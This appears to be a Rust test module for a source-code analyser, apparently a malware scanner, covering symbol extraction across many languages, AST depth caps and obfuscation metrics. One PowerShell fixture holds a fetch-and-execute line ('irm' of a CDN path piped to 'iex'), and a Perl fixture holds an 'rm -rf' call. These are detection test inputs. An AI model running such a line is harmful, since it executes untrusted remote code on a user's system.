    fn ordinary_large_file_queries_within_a_tenth_of_the_budget() {
        let mut src = String::new();
        let mut i = 0;
        while src.len() < SOURCE_QUERY_BYTE_LIMIT {
            src.push_str(&format!(
                "function a{i}(e,t,n){{var r=n({i}),o=require(\"m{i}\");return e.exports=Object.assign({{}},t,{{x{i}:[1,2,3].map(function(u){{return u*{i}}}),y:\"s{i}\"+t.q}}),o}}\n"
            ));
            i += 1;
        }
        let tree = javascript_tree(&src);
        for kind in [QueryKind::Imports, QueryKind::Functions, QueryKind::Classes] {
            let result = collect_with_work_budget(
                javascript_query(kind),
                &src,
                tree.root_node(),
                SOURCE_QUERY_WORK_BUDGET / 10,
            );
            assert!(
                !result.timed_out,
                "{kind:?} ran out of a tenth of its budget"
            );
        }
    }

    /// Without the start-depth cap, every step under 10k nested arrow
    /// functions revisits an open match per enclosing call: the imports query
    /// needs about 4k polls and its cost grows with the square of the depth.
    /// With the cap the cursor stops descending past it, so a tenth of that
    /// suffices.
    #[test]
    fn deep_nesting_is_not_walked_past_the_start_depth_cap() {
        let src = format!(
            "x = {}{};\n",
            "((a, b".repeat(10_000),
            ") => 1)".repeat(10_000)
        );
        // Deep trees recurse in tree-sitter's C code; give it a worker stack.
        let result = std::thread::Builder::new()
            .stack_size(64 * 1024 * 1024)
            .spawn(move || {
                let tree = javascript_tree(&src);
                let imports = javascript_query(QueryKind::Imports);
                collect_with_work_budget(imports, &src, tree.root_node(), 400).timed_out
            })
            .expect("spawn query thread")
            .join()
            .expect("deep query must not panic");
        assert!(!result, "the imports query walked past the start-depth cap");
    }

    /// Python `import os` / `from sys import path` populate the
    /// unified [`crate::Symbols`] view with the language name as
    /// `source` and a non-zero byte offset.
    #[test]
    fn python_imports_populate_typed_view() {
        let src = b"import os\nfrom sys import path\nimport hashlib\n";
        // `OpenOptions::path` so fileid classifies as Python via the
        // `.py` extension hint — without it the bytes look like
        // plain text and the source extractor never runs.
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("test.py"))
            .open(src);
        let _ = parsed.values();
        let imports: Vec<(&str, Option<&str>, bool)> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Import)
            .filter_map(|s| match s {
                crate::Symbol::Import {
                    name,
                    library,
                    offset,
                    ..
                } => Some((name.as_str(), library.as_deref(), offset.is_some())),
                _ => None,
            })
            .collect();
        assert!(
            !imports.is_empty(),
            "expected python imports to populate typed view"
        );
        let names: std::collections::HashSet<&str> = imports.iter().map(|(n, _, _)| *n).collect();
        assert!(names.contains("os"), "got names {names:?}");
        assert!(names.contains("hashlib"));
        assert!(
            imports
                .iter()
                .any(|(name, lib, _)| *name == "path" && *lib == Some("sys"))
        );
        for (_, _, has_offset) in &imports {
            assert!(*has_offset);
        }
    }

    #[test]
    fn python_from_import_owners_and_aliases_are_preserved() {
        let src = b"from os import path as p\nfrom sys import path as p\nfrom .pkg import path as p\nimport requests as r\nfrom os import system\t as   Run\n";
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("imports.py"))
            .open(src);
        let imports: Vec<_> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Import)
            .filter_map(|s| match s {
                crate::Symbol::Import {
                    name,
                    library,
                    alias,
                    ..
                } => Some((name.as_str(), library.as_deref(), alias.as_deref())),
                _ => None,
            })
            .collect();
        for expected in [
            ("path", Some("os"), Some("p")),
            ("path", Some("sys"), Some("p")),
            (".pkg.path", Some(".pkg"), Some("p")),
            ("requests", None, Some("r")),
            ("system", Some("os"), Some("Run")),
        ] {
            assert!(
                imports.contains(&expected),
                "missing {expected:?}: {imports:?}"
            );
        }
    }

    /// Python relative imports (`from . import requests`) must carry their
    /// relative prefix so a local submodule named `requests` is not recorded
    /// as an import of the PyPI `requests` library. Absolute imports of the
    /// same name stay bare.
    #[test]
    fn python_relative_import_member_keeps_prefix() {
        let src = b"from . import requests\nfrom .graph import responses\nimport os\n";
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("rel.py"))
            .open(src);
        let _ = parsed.values();
        let names: std::collections::HashSet<String> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Import)
            .filter_map(|s| match s {
                crate::Symbol::Import { name, .. } => Some(name.clone()),
                _ => None,
            })
            .collect();
        assert!(
            names.contains(".requests"),
            "relative member should be prefixed, got {names:?}"
        );
        assert!(
            !names.contains("requests"),
            "bare `requests` must not appear for a relative import, got {names:?}"
        );
        assert!(
            names.contains(".graph.responses"),
            "member of `.graph` should be `.graph.responses`, got {names:?}"
        );
        assert!(
            names.contains("os"),
            "absolute import unaffected, got {names:?}"
        );
    }

    /// Zig's grammar stores field access under `member` and positional call
    /// arguments as direct expression children. Both must be projected into
    /// the shared symbols view so rules can match `ch.txtFields("...")` and
    /// inspect its literal argument without a language-specific escape hatch.
    #[test]
    fn zig_calls_include_static_targets_members_and_arguments() {
        let src = br#"const ch = @import("channels.zig");
pub fn run() void {
    _ = ch.gateOk("gate");
    if (!ch.gateOk("negated")) return;
    _ = ch.txtFields("relay.example", "out");
    _ = ch.gateOk(true);
}
"#;
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("main.zig"))
            .open(src);
        let _ = parsed.values();

        let calls: Vec<(&str, usize, bool)> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Call)
            .filter_map(|s| match s {
                crate::Symbol::Call {
                    target: Some(target),
                    args,
                    ..
                } => Some((
                    target.as_str(),
                    args.len(),
                    args.iter()
                        .any(|arg| matches!(arg, crate::Arg::Bool { value: true })),
                )),
                _ => None,
            })
            .collect();
        assert!(
            calls
                .iter()
                .any(|(target, argc, _)| *target == "ch.txtFields" && *argc == 2)
                && calls
                    .iter()
                    .any(|(target, _, has_true)| *target == "ch.gateOk" && *has_true),
            "expected static Zig call target and two arguments, got {calls:?}"
        );

        let members: Vec<&str> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Member)
            .filter_map(|s| match s {
                crate::Symbol::Member { path, .. } => Some(path.as_str()),
                _ => None,
            })
            .collect();
        assert!(
            members.contains(&"ch.txtFields"),
            "expected Zig field chain, got {members:?}"
        );
    }

    /// Call arguments and the literal tier share one decoder, so a prefixed
    /// literal decodes in both; unquoted forms stay out of call arguments.
    #[test]
    fn prefixed_literals_decode_in_call_arguments_like_literals() {
        let src = br#"run(f"cmd {x}", b"\x41", r"\d", rb"\x42", u"plain")
"#;
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("call.py"))
            .open(src);
        let args: Vec<String> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Call)
            .find_map(|s| match s {
                crate::Symbol::Call {
                    target: Some(target),
                    args,
                    ..
                } if target == "run" => Some(args),
                _ => None,
            })
            .expect("run call")
            .iter()
            .map(|arg| match arg {
                crate::Arg::String { value } => value.clone(),
                other => panic!("expected a string argument, got {other:?}"),
            })
            .collect();
        assert_eq!(args, ["cmd {x}", "A", "\\d", "\\x42", "plain"]);
        let literals: Vec<&str> = parsed.literals().iter().map(|l| l.text.as_str()).collect();
        for arg in &args {
            assert!(
                literals.contains(&arg.as_str()),
                "{arg} not in {literals:?}"
            );
        }

        let perl = b"system(q{rm -rf /tmp/x});\n";
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("run.pl"))
            .open(perl);
        assert!(
            parsed
                .literals()
                .iter()
                .any(|l| l.text == "q{rm -rf /tmp/x}"),
            "unquoted literal keeps its source text in the literal tier"
        );
        assert!(
            !parsed
                .symbols()
                .iter_kind(crate::SymbolKind::Call)
                .any(|s| matches!(
                    s,
                    crate::Symbol::Call { args, .. }
                        if args.iter().any(|a| matches!(a, crate::Arg::String { .. }))
                )),
            "an unquoted literal is not a decoded string argument"
        );
    }

    /// The outermost node of a member chain records the whole path and every
    /// static prefix, each at its first offset; nested links are not
    /// re-resolved, and a dynamic link only hides the paths that depend on it.
    #[test]
    fn member_chains_record_every_static_prefix_once() {
        let src = b"x.y;\na.b().c[\"d\"].e[k].f;\nx.y.z;\n";
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("m.js"))
            .open(src);
        let members: std::collections::BTreeMap<&str, u64> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Member)
            .filter_map(|s| match s {
                crate::Symbol::Member { path, offset } => Some((path.as_str(), (*offset)?)),
                _ => None,
            })
            .collect();
        let expected = std::collections::BTreeMap::from([
            ("x.y", 0),
            ("x.y.z", 26),
            ("a.b", 5),
            ("a.b.c", 5),
            ("a.b.c.d", 5),
            ("a.b.c.d.e", 5),
        ]);
        assert_eq!(members, expected);
        assert_eq!(parsed.metrics().get("ast.max_member_depth"), Some(5.0));
    }

    /// A `+` chain is measured once, at the node whose parent is not itself a
    /// binary expression; a `+` nested under another operator is not a root.
    #[test]
    fn concat_chain_is_measured_at_its_outermost_node() {
        let metric = |src: &str| {
            crate::OpenOptions::new()
                .path(std::path::Path::new("c.js"))
                .open(src.as_bytes())
                .metrics()
                .get("ast.max_concat_chain")
        };
        assert_eq!(metric("y = a + b + c + (d + e);\n"), Some(4.0));
        assert_eq!(metric("y = a + b - c;\n"), None);
    }

    #[test]
    fn go_package_name_comes_from_the_syntax_tree() {
        let package = |path: &str, src: &str| {
            let parsed = crate::OpenOptions::new()
                .path(std::path::Path::new(path))
                .open(src.as_bytes());
            parsed
                .source_ast()
                .and_then(|ast| go_package_name(&ast).map(str::to_string))
        };
        assert_eq!(
            package("a.go", "package demo\nfunc main(){}\n").as_deref(),
            Some("demo")
        );
        assert_eq!(package("a.go", "func main(){}\n").as_deref(), Some(""));
        assert_eq!(package("a.py", "package = 1\n"), None);
    }

    /// Helper: parse `src` as a source file with the given extension
    /// and return the import names + (function name, decl) pairs from
    /// the unified [`crate::Symbols`] view. Asserts the file classified
    /// to a non-text-only source extractor (i.e. `text.*` metrics
    /// fired) so callers can focus on language-specific structural facts.
    fn parse_source(name: &str, src: &[u8]) -> (Vec<String>, Vec<String>) {
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new(name))
            .open(src);
        let _ = parsed.values();
        let imports: Vec<String> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Import)
            .filter_map(|s| match s {
                crate::Symbol::Import { name, .. } => Some(name.clone()),
                _ => None,
            })
            .collect();
        let functions: Vec<String> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Function)
            .filter_map(|s| match s {
                crate::Symbol::Function { name, .. } => Some(name.clone()),
                _ => None,
            })
            .collect();
        assert!(
            parsed.metrics().get("text.lines").unwrap_or(0.0) > 0.0,
            "expected text.lines metric to fire for {name}"
        );
        (imports, functions)
    }

    #[test]
    fn ruby_imports_and_definitions() {
        let src = b"require 'json'\nrequire_relative './lib'\nclass Greeter\n  def hello; end\nend\nmodule M; end\n";
        let (imports, functions) = parse_source("app.rb", src);
        assert!(imports.iter().any(|s| s == "json"), "got {imports:?}");
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"hello"), "expected hello");
        assert!(names.contains(&"Greeter"), "expected Greeter");
        assert!(names.contains(&"M"), "expected M");
    }

    #[test]
    fn lua_imports_and_definitions() {
        let src = b"local M = require(\"socket\")\nfunction greet(name)\n  return name\nend\nlocal function add(a, b) return a + b end\n";
        let (imports, functions) = parse_source("script.lua", src);
        assert!(imports.iter().any(|s| s == "socket"), "got {imports:?}");
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"greet"), "got {names:?}");
    }

    #[test]
    fn csharp_imports_and_definitions() {
        let src = b"using System;\nusing System.IO;\nnamespace Foo {\n  public class Bar {\n    public void Hello() {}\n  }\n}\n";
        let (imports, functions) = parse_source("App.cs", src);
        assert!(
            imports.iter().any(|s| s == "System" || s == "System.IO"),
            "got {imports:?}"
        );
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"Hello"), "expected Hello");
        assert!(names.contains(&"Bar"), "expected Bar");
    }

    #[test]
    fn c_imports_and_definitions() {
        let src = b"#include <stdio.h>\n#include \"local.h\"\nint add(int a, int b) { return a + b; }\nstruct P { int x; };\n";
        let (imports, functions) = parse_source("main.c", src);
        assert!(!imports.is_empty(), "expected C #include imports");
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"add"), "expected add");
        assert!(names.contains(&"P"), "expected P");
    }

    #[test]
    fn scala_imports_and_definitions() {
        let src = b"import scala.collection.mutable\nclass Greeter { def hello() = 1 }\nobject O { def add(a: Int, b: Int) = a + b }\n";
        let (imports, functions) = parse_source("App.scala", src);
        assert!(!imports.is_empty(), "expected scala imports");
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"hello"), "expected hello");
        assert!(names.contains(&"Greeter"), "expected Greeter");
    }

    #[test]
    fn objc_imports_and_definitions() {
        let src = b"#import <Foundation/Foundation.h>\n@interface Greeter : NSObject\n- (void)hello;\n@end\n@implementation Greeter\n- (void)hello {}\n@end\n";
        let (imports, _functions) = parse_source("view.m", src);
        assert!(!imports.is_empty(), "expected objc imports");
    }

    #[test]
    fn kotlin_imports_and_definitions() {
        let src = b"package foo\nimport java.io.File\nclass Greeter { fun hello() = 1 }\nfun add(a: Int, b: Int) = a + b\n";
        let (imports, functions) = parse_source("App.kt", src);
        assert!(
            imports.iter().any(|s| s.contains("File")),
            "got {imports:?}"
        );
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"hello"), "got {names:?}");
        assert!(names.contains(&"add"), "got {names:?}");
    }

    #[test]
    fn swift_imports_and_definitions() {
        let src = b"import Foundation\nclass Greeter {\n  func hello() -> Int { return 1 }\n}\nfunc add(a: Int, b: Int) -> Int { return a + b }\n";
        let (imports, functions) = parse_source("app.swift", src);
        assert!(imports.iter().any(|s| s == "Foundation"), "got {imports:?}");
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"add"), "got {names:?}");
    }

    #[test]
    fn perl_imports_and_definitions() {
        let src = b"use strict;\nuse warnings;\nuse Foo::Bar;\npackage My::Class;\nsub greet { return 1 }\nsub add { my ($a, $b) = @_; return $a + $b }\n";
        let (imports, functions) = parse_source("app.pl", src);
        assert!(imports.iter().any(|s| s == "Foo::Bar"), "got {imports:?}");
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"greet"), "expected greet");
        assert!(names.contains(&"add"), "expected add");
        assert!(names.contains(&"My::Class"), "expected My::Class");
    }

    #[test]
    fn groovy_imports_and_definitions() {
        let src = b"package com.example\nimport java.util.List\nimport groovy.json.*\nclass Greeter {\n  def hello(name) { return \"hi\" }\n}\n";
        let (imports, functions) = parse_source("App.groovy", src);
        assert!(
            imports.iter().any(|s| s == "java.util.List"),
            "got {imports:?}"
        );
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"Greeter"), "got {names:?}");
    }

    #[test]
    fn zig_imports_and_definitions() {
        let src = b"const std = @import(\"std\");\nfn main() void {\n  std.debug.print(\"hi\\n\", .{});\n}\ntest \"smoke\" { try std.testing.expect(true); }\n";
        let (imports, functions) = parse_source("main.zig", src);
        assert!(imports.iter().any(|s| s == "std"), "got {imports:?}");
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"main"), "got {names:?}");
    }

    #[test]
    fn elixir_imports_and_definitions() {
        let src = b"defmodule Greeter do\n  alias My.Helper\n  import Logger\n  def hello(name), do: name\nend\n";
        let (imports, functions) = parse_source("app.ex", src);
        assert!(
            imports.iter().any(|s| s == "My.Helper" || s == "Logger"),
            "got {imports:?}"
        );
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(
            names.contains(&"hello") || names.contains(&"Greeter"),
            "got {names:?}"
        );
    }

    #[test]
    fn makefile_targets_and_includes() {
        let src = b"include common.mk\n\nall: build\n\nbuild:\n\t@echo building\n";
        let (imports, functions) = parse_source("Makefile", src);
        assert!(imports.iter().any(|s| s == "common.mk"), "got {imports:?}");
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(
            names.iter().any(|n| *n == "all" || *n == "build"),
            "got {names:?}"
        );
    }

    #[test]
    fn powershell_functions_extracted() {
        let src =
            b"function Get-Greeting {\n  param([string]$Name)\n  Write-Output \"Hi $Name\"\n}\n";
        let (_imports, functions) = parse_source("script.ps1", src);
        let names: Vec<&str> = functions.iter().map(String::as_str).collect();
        assert!(names.contains(&"Get-Greeting"), "got {names:?}");
    }

    #[test]
    fn powershell_protocolless_url_argument_is_extracted_as_literal() {
        let src = b"irm cdn.jsdelivr.net/gh/19875567137/repo/80-7314 | iex\n";
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("sample.ps1"))
            .open(src);
        assert!(
            parsed
                .literals()
                .iter()
                .any(|literal| literal.text == "cdn.jsdelivr.net/gh/19875567137/repo/80-7314"),
            "protocol-less PowerShell URL argument was not promoted to literals"
        );
    }

    /// Python `def foo()` / `class Bar:` populate the unified
    /// [`crate::Symbols`] view with `decl: "function"` / `"class"`.
    #[test]
    fn python_functions_and_classes_populate_typed_view() {
        let src = b"def hello():\n    pass\n\nclass Greeter:\n    pass\n";
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("test.py"))
            .open(src);
        let _ = parsed.values();
        let names: Vec<&str> = parsed
            .symbols()
            .iter_kind(crate::SymbolKind::Function)
            .filter_map(|s| match s {
                crate::Symbol::Function { name, .. } => Some(name.as_str()),
                _ => None,
            })
            .collect();
        assert!(names.contains(&"hello"), "expected hello");
        assert!(names.contains(&"Greeter"), "expected Greeter");
    }

    /// Regression: `walk_node` used to recurse one stack frame per tree
    /// level with no bound, so a pathologically deep source file (e.g.
    /// thousands of nested parens) overflowed the worker stack and aborted
    /// the whole process. The walk must now stop at [`ast_walk::MAX_AST_DEPTH`]
    /// and complete, with `ast.max_depth` saturating at the cap.
    #[test]
    #[ignore = "CPU-saturating: parses a 50k-deep AST on an 8 MiB worker stack (>60s). Run with --ignored."]
    fn deeply_nested_source_does_not_overflow_stack() {
        let nesting = (super::ast_walk::MAX_AST_DEPTH as usize) * 3;
        let mut src = String::with_capacity(nesting * 2 + 8);
        src.push_str("x = ");
        src.push_str(&"(".repeat(nesting));
        src.push('1');
        src.push_str(&")".repeat(nesting));
        src.push('\n');

        // Run on a worker-sized stack so the test reflects production limits
        // rather than the test harness's smaller default stack.
        let max_depth = std::thread::Builder::new()
            .stack_size(8 * 1024 * 1024)
            .spawn(move || {
                let parsed = crate::OpenOptions::new()
                    .path(std::path::Path::new("deep.js"))
                    .open(src.as_bytes());
                parsed.metrics().get("ast.max_depth").unwrap_or(0.0)
            })
            .expect("spawn walker thread")
            .join()
            .expect("deep AST walk must not overflow the stack");

        assert_eq!(
            max_depth,
            f64::from(super::ast_walk::MAX_AST_DEPTH),
            "ast.max_depth should saturate at the recursion cap"
        );
    }

    /// Parse `src` (as `path`) on a worker-sized stack and return its metrics.
    /// The unbounded AST-helper recursions (member / concat / subscript chains)
    /// used to recurse one frame — and, for member/subscript, one `String`
    /// allocation — per link, overflowing the stack and `abort()`ing the whole
    /// process on a chain thousands deep. With the cap in place a chain far
    /// past [`ast_walk::MAX_AST_DEPTH`] must complete with `ast.max_depth` and
    /// every chain-length metric pinned at the cap, never growing with the
    /// input. `join()` returning `Ok` asserts nothing overflowed.
    ///
    /// 8 MiB matches the existing `deeply_nested_source_does_not_overflow_stack`
    /// test. We don't probe smaller: well past the cap, tree-sitter's own
    /// C-level parse/free recurses with the tree and overflows a 2 MiB stack
    /// independently of this crate's walk — a separate layer that the 2 MiB
    /// `MAX_AST_FILE_BYTES` cap keeps clear of the 256 MiB production stack.
    fn metrics_on_worker_stack(path: &str, src: String) -> crate::output::Metrics {
        let path = path.to_string();
        std::thread::Builder::new()
            .stack_size(8 * 1024 * 1024)
            .spawn(move || {
                let parsed = crate::OpenOptions::new()
                    .path(std::path::Path::new(&path))
                    .open(src.as_bytes());
                parsed.metrics().clone()
            })
            .expect("spawn walker thread")
            .join()
            .expect("deep chain must not overflow the stack")
    }

    /// Regression: `static_dotted_chain` recursed one stack frame (plus a
    /// `String` allocation) per link of a member chain with no bound, so a
    /// pathological `a.a.a.…` thousands deep overflowed the worker stack and
    /// aborted the process. It must now cap at `MAX_AST_DEPTH` and complete.
    #[test]
    #[ignore = "CPU-saturating: parses a 50k-deep AST on an 8 MiB worker stack (>60s). Run with --ignored."]
    fn deep_member_chain_does_not_overflow_stack() {
        let chain = "a".to_string() + &".a".repeat(50_000);
        let m = metrics_on_worker_stack("deep.js", format!("x = {chain};\n"));
        assert_eq!(
            m.get("ast.max_depth").unwrap_or(0.0),
            f64::from(super::ast_walk::MAX_AST_DEPTH),
            "max_depth should saturate at the cap"
        );
        assert_eq!(
            m.get("ast.depth_capped").unwrap_or(0.0),
            1.0,
            "a chain past the cap must set ast.depth_capped"
        );
    }

    /// Regression: `string_concat_chain_length::descend` recursed per `+` link
    /// with no bound — a `"a"+"a"+…` chain thousands long overflowed the stack.
    #[test]
    #[ignore = "CPU-saturating: parses a 50k-deep AST on an 8 MiB worker stack (>60s). Run with --ignored."]
    fn deep_concat_chain_does_not_overflow_stack() {
        let chain = "\"a\"".to_string() + &"+\"a\"".repeat(50_000);
        let m = metrics_on_worker_stack("deep.js", format!("x = {chain};\n"));
        assert_eq!(
            m.get("ast.depth_capped").unwrap_or(0.0),
            1.0,
            "a concat chain past the cap must set ast.depth_capped"
        );
        // The chain-length metric is bounded too — it can't exceed the cap.
        let concat = m.get("ast.max_concat_chain").unwrap_or(0.0);
        assert!(
            concat <= f64::from(super::ast_walk::MAX_AST_DEPTH),
            "concat chain length must saturate at the cap, got {concat}"
        );
    }

    /// Regression: nested string-subscript folding (`obj["a"]["b"]…`) is
    /// mutually recursive between `static_dotted_chain` and
    /// `try_fold_string_subscript`; both were unbounded.
    #[test]
    #[ignore = "CPU-saturating: parses a 50k-deep AST on an 8 MiB worker stack (>60s). Run with --ignored."]
    fn deep_subscript_chain_does_not_overflow_stack() {
        let chain = "a".to_string() + &"[\"b\"]".repeat(50_000);
        let m = metrics_on_worker_stack("deep.js", format!("x = {chain};\n"));
        assert_eq!(
            m.get("ast.depth_capped").unwrap_or(0.0),
            1.0,
            "a subscript chain past the cap must set ast.depth_capped"
        );
    }

    /// `ast.op_density.<op>` must equal count / node_count and rise sharply
    /// when an operator dominates the tree — the signal that distinguishes an
    /// obfuscated `number - number` array from a large benign bundle (which
    /// has a high subtraction *count* but a low *density*).
    #[test]
    fn subtraction_density_reflects_concentration() {
        let body: String = (0..60)
            .map(|i| format!("{}-{}", i + 100, i))
            .collect::<Vec<_>>()
            .join(",");
        let src = format!("var a=[{body}];\n");
        let parsed = crate::OpenOptions::new()
            .path(std::path::Path::new("o.js"))
            .open(src.as_bytes());
        let m = parsed.metrics();
        let sub = m.get("ast.op.sub").unwrap_or(0.0);
        let nodes = m.get("ast.node_count").unwrap_or(0.0);
        let density = m.get("ast.op_density.sub").unwrap_or(0.0);

        assert_eq!(sub, 60.0, "60 subtraction expressions");
        assert!(nodes > 0.0);
        assert!(
            (density - sub / nodes).abs() < 1e-9,
            "density must equal count / node_count"
        );
        assert!(
            density > 0.05,
            "a packed subtraction array is dense, got {density}"
        );
    }
}
